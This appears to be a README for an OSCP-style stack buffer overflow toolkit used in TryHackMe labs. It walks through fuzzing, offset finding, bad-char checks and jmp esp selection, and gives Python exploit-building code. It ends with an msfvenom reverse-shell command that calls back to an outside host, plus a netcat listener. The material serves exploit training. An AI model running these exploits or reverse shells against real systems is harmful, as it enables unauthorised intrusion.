jotyGill/qbof
qbof: Quickly crack simple stack based buffer overflows

Created while preparing for the OSCP to work through a simple stack-based BOF in under 20 minutes. These two Python scripts (fuzzer.py and eipcontroller.py) are all that is needed.

Highly recommended: the Buffer Overflow Prep room on TryHackMe, to practice BOF.

pwntools is needed for the pattern-create functionality (--pattern and --find-offset):

pip install --user pwntools

Fuzzing

# Fuzz with a range of sizes (100, 200, ... 2100 bytes) to find the crash point
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --range "100-2100" --range-step 100

# Confirm the crash by sending a fixed-size payload
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100

# Send a unique (cyclic) pattern instead of just AAAA, so the bytes that land in EIP identify a position
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100 --pattern

# Find the offset by providing the value shown in the EIP register at the crash, like this
python fuzzer.py --find-offset "61 75 74 61"
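The pattern and offset steps above, as an added example that is not part of the qbof scripts: it generates the cyclic pattern (a de Bruijn sequence over the lowercase alphabet with unique 4-byte windows, which is assumed here to mirror pwntools' default cyclic() settings), converts the EIP value as the debugger displays it back into memory order (x86 is little-endian, so the displayed value is byte-reversed), and searches the pattern for it. The offset is only meaningful when the same generator produced the pattern that was sent, which is why both halves live in one file. The prefix "OVERFLOW1 " and offset 1978 are taken from this page; the "crash" at the bottom is constructed.

```python
"""Cyclic pattern / offset finder for the --pattern and --find-offset steps (added example)."""
import struct
from typing import Iterator

# Assumption: lowercase alphabet and 4-byte windows, as pwntools' cyclic() uses by default.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ_LEN = 4  # EIP is 32 bits, so 4 bytes identify the position


def de_bruijn(alphabet: bytes = ALPHABET, n: int = SUBSEQ_LEN) -> Iterator[int]:
    """Yield B(k, n) byte by byte using the standard FKM (Lyndon word) construction.
    Every window of n bytes is unique, so any 4 bytes that land in EIP map to one offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[int]:
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (what --pattern sends after the prefix)."""
    out = bytearray()
    for b in de_bruijn():
        if len(out) == length:
            break
        out.append(b)
    if len(out) < length:
        raise ValueError("pattern exhausted; increase the alphabet or window size")
    return bytes(out)


def pattern_payload(prefix: bytes, size: int) -> bytes:
    """Prefix followed by `size` bytes of pattern, as the fuzzer would send it."""
    return prefix + cyclic(size)


def eip_to_memory_bytes(eip_hex: str) -> bytes:
    """'61 75 74 61' or '0x61757461' as shown in the EIP register -> the 4 bytes as they
    sit in memory. The register pane shows the value most-significant byte first, while
    memory holds it little-endian, so the bytes come out reversed."""
    value = int(eip_hex.lower().replace("0x", "").replace(" ", ""), 16)
    return struct.pack("<I", value)


def eip_display(mem4: bytes) -> str:
    """Inverse of the above: how the debugger shows these 4 memory bytes once they hit EIP."""
    return "%08x" % struct.unpack("<I", mem4)[0]


def find_offset(eip_hex: str, max_len: int = 5000) -> int:
    """Offset into the pattern of the bytes that overwrote EIP, or -1 when the value is
    not in the pattern (wrong byte order, or the crash was not sent with --pattern)."""
    return cyclic(max_len).find(eip_to_memory_bytes(eip_hex))


if __name__ == "__main__":
    sent = pattern_payload(b"OVERFLOW1 ", 2100)
    # Constructed crash: pretend the bytes at offset 1978 ended up in EIP.
    shown = eip_display(cyclic(2100)[1978:1982])
    print("sent %d bytes, EIP as displayed: %s -> offset %d" % (len(sent), shown, find_offset(shown)))
```

Note that the offset excludes the prefix: the `--offset` value handed to eipcontroller.py is counted from the first pattern byte, exactly as `find` returns it here.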

Test EIP

# Test that EIP is controlled: by default the script places BBBB (42424242) at the offset
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset {{1978}}

Find Bad Chars

# Set mona's working folder first so bytearray.bin ends up somewhere known
!mona config -set workingfolder c:\mona

# Generate the byte array with mona (excluding \x00 to begin with) to compare against the payload array
!mona bytearray -cpb "\x00"

# Send the full hex array, then compare it with what actually landed on the stack
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --check-bad-chars

# Compare from the start address of the full hex array in the DUMP window (ESP, plus the NOP length if NOPs were sent)
!mona compare -f c:\mona\PROJECT\bytearray.bin -a {{ESP VALUE + NOP ADDR}}
# Example: !mona compare -f C:\mona\oscp\bytearray.bin -a 0189FA30

# Example bad char compare output
# 00 07 08 2e 2f a0 a1
# Only the first byte of each adjacent pair is a confirmed bad char: 00 07 2e a0
# The byte right after a bad char is often mangled as a side effect (08, 2f and a1 here), so exclude only the
# confirmed ones, regenerate bytearray.bin without them, resend, and check whether anything new shows up in the
# diff between the payload and the generated array. Repeat until mona reports the array unmodified.
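The compare logic described above, as an added example rather than code from qbof or mona: it builds the byte array the same way (all byte values minus the excluded ones, ascending), diffs it against the bytes read back from the stack, and treats only the first byte of each mismatched pair as confirmed, flagging the following byte as a suspect so it is not excluded prematurely. The target is stood in for by a constructed function that mangles 07, 2e and a0 and corrupts the byte after each, reproducing the 00 07 08 2e 2f a0 a1 output quoted on the page; the second round shows the array surviving once only the confirmed chars are excluded.

```python
"""Bad-char array generation and comparison for the --check-bad-chars step (added example)."""
from typing import Dict, List


def byte_array(exclude: bytes = b"\x00") -> bytes:
    """All 256 byte values minus the excluded ones, ascending, like !mona bytearray -cpb."""
    return bytes(b for b in range(256) if b not in exclude)


def cpb_string(exclude: bytes) -> str:
    r"""Render bad chars as the "\x00\x07..." string that mona -cpb and msfvenom -b take."""
    return "".join("\\x%02x" % b for b in exclude)


def compare(sent: bytes, dumped: bytes) -> Dict[str, List[int]]:
    """Diff the array that was sent against the bytes read back from the stack.

    A bad char usually appears as a run of two mismatches: the char itself and the byte
    after it, which the target mangles as a side effect. Only the first byte of each run
    is confirmed; the second is a suspect and is kept for the next round. Bytes beyond a
    truncated dump cannot be judged and are reported separately."""
    confirmed: List[int] = []
    suspect: List[int] = []
    n = min(len(sent), len(dumped))
    i = 0
    while i < n:
        if sent[i] != dumped[i]:
            confirmed.append(sent[i])
            if i + 1 < n and sent[i + 1] != dumped[i + 1]:
                suspect.append(sent[i + 1])
                i += 1  # skip the collateral byte
        i += 1
    return {"confirmed": confirmed, "suspect": suspect, "unreadable": list(sent[n:])}


def next_exclude(exclude: bytes, result: Dict[str, List[int]]) -> bytes:
    """Exclusion list for the next round: the previous chars plus the confirmed ones only."""
    return bytes(sorted(set(exclude) | set(result["confirmed"])))


def simulate_target(sent: bytes, mangles: bytes) -> bytes:
    """Constructed stand-in for the vulnerable service (no real target is contacted):
    each byte in `mangles` is replaced by 0x20 and the byte after it is corrupted."""
    out = bytearray(sent)
    for i, b in enumerate(sent):
        if b in mangles:
            out[i] = 0x20
            if i + 1 < len(out):
                out[i + 1] ^= 0xFF
    return bytes(out)


if __name__ == "__main__":
    exclude = b"\x00"
    for rnd in range(1, 4):
        arr = byte_array(exclude)
        res = compare(arr, simulate_target(arr, b"\x07\x2e\xa0"))
        print("round %d -cpb \"%s\" confirmed=%s suspect=%s" % (
            rnd, cpb_string(exclude),
            ["%02x" % b for b in res["confirmed"]], ["%02x" % b for b in res["suspect"]]))
        if not res["confirmed"]:
            break
        exclude = next_exclude(exclude, res)
```

The loop stops once a round comes back clean; the final `exclude` is the string to hand to `!mona jmp -cpb` and `msfvenom -b`.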

Find JMP ESP Instruction

# Find a jmp esp (or equivalent) in all loaded modules, excluding addresses that contain bad chars
# The address itself must be free of bad chars, and the module it lives in should show False for
# Rebase, SafeSEH, ASLR and NXCompat in the !mona modules listing, or the address will not be stable
!mona jmp -r esp -cpb "\x00\x{{BADCHARS}}"
# Example: !mona jmp -r esp -cpb "\x00\x07\x2E\xA0"

Put and Test JMP ESP Address into EIP

# Reverse the bytes of the address to make it little endian
# Example: 0x625011af from the mona output becomes "\xAF\x11\x50\x62"
# Manually put it in eipcontroller.py
eip = "\xAF\x11\x50\x62"

# Set a breakpoint on the found address in Immunity
-> | black dotted line > Search address "625011af" > Select it, then F2 for a breakpoint

# Test that execution reaches it (the breakpoint should be hit after the crash)
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978

MSFvenom Payload and GG

# -b excludes the confirmed bad chars; EXITFUNC=thread keeps the service alive when the shell exits
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.17.12.88 LPORT=443 EXITFUNC=thread -b '\x00\x07\x2E\xA0' -f c

# Manually put the generated buf into eipcontroller.py
buf = "PAYLOAD"

# --nop 32 puts a NOP sled between EIP and the shellcode so the encoder's decoder stub has room
# to unpack without overwriting itself. Start a listener on LPORT first (e.g. nc -nvlp 443).
python eipcontroller.py  --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --nop 32
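The last two steps (little-endian EIP, then NOPs and the msfvenom buffer), as an added example that is not code from eipcontroller.py: it converts the jmp esp address, pulls the `\xNN` bytes out of msfvenom's `-f c` output so nothing has to be retyped, refuses to build if the address or the shellcode contains a bad char, and lays the buffer out as prefix + padding + EIP + NOP sled + shellcode. The prefix, offset, address and bad chars are the ones used on this page; the shellcode is a constructed int3 placeholder in msfvenom's output shape, not real shellcode, and the send function is only called by hand.

```python
"""Final buffer: prefix + padding + little-endian jmp esp + NOPs + shellcode (added example)."""
import re
import socket
import struct

PREFIX = b"OVERFLOW1 "
OFFSET = 1978
JMP_ESP = 0x625011AF
BADCHARS = b"\x00\x07\x2e\xa0"

# Constructed placeholder in the shape msfvenom -f c prints: int3 bytes, not real shellcode.
SAMPLE_MSFVENOM_C = r'''
unsigned char buf[] = 
"\xcc\xcc\xcc\xcc"
"\xcc\xcc\xcc\xcc";
'''


def little_endian(addr: int) -> bytes:
    """0x625011af -> b"\xaf\x11\x50\x62": x86 stores the low byte first."""
    return struct.pack("<I", addr)


def parse_msfvenom_c(text: str) -> bytes:
    r"""Collect every \xNN escape from msfvenom's -f c output, across all its lines."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def bad_chars_in(data: bytes, badchars: bytes = BADCHARS) -> list:
    """Sorted list of bad chars present in `data` (empty when it is clean)."""
    return sorted({b for b in data if b in badchars})


def address_is_clean(addr: int, badchars: bytes = BADCHARS) -> bool:
    """A jmp esp address is usable only if none of its four bytes is a bad char."""
    return not bad_chars_in(little_endian(addr), badchars)


def build_exploit(prefix: bytes, offset: int, jmp_esp: int, shellcode: bytes,
                  badchars: bytes = BADCHARS, nops: int = 32) -> bytes:
    """Assemble the buffer, rejecting anything that would be corrupted in transit."""
    eip = little_endian(jmp_esp)
    hits = bad_chars_in(eip, badchars)
    if hits:
        raise ValueError("jmp esp address contains bad chars: %s" % ["%02x" % b for b in hits])
    hits = bad_chars_in(shellcode, badchars)
    if hits:
        raise ValueError("shellcode contains bad chars %s; regenerate with msfvenom -b" % hits)
    # After the overwritten return address is popped, ESP points just past it, so the NOP
    # sled and shellcode go straight after EIP; jmp esp lands in the sled and slides down.
    return prefix + b"A" * offset + eip + b"\x90" * nops + shellcode


def send_exploit(ip: str, port: int, payload: bytes, timeout: float = 5.0) -> None:
    """Deliver the buffer over TCP (add a line terminator if the target protocol needs one)."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    sc = parse_msfvenom_c(SAMPLE_MSFVENOM_C)
    payload = build_exploit(PREFIX, OFFSET, JMP_ESP, sc)
    start = len(PREFIX) + OFFSET
    print("%d bytes, EIP bytes = %s" % (len(payload), payload[start:start + 4].hex()))
    # send_exploit("TARGET_IP", TARGET_PORT, payload)  # run against the lab box only
```

Replace `SAMPLE_MSFVENOM_C` with the real msfvenom output (the whole `unsigned char buf[] = ...` text can be pasted in verbatim) and the address check will still run over whatever is pasted.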
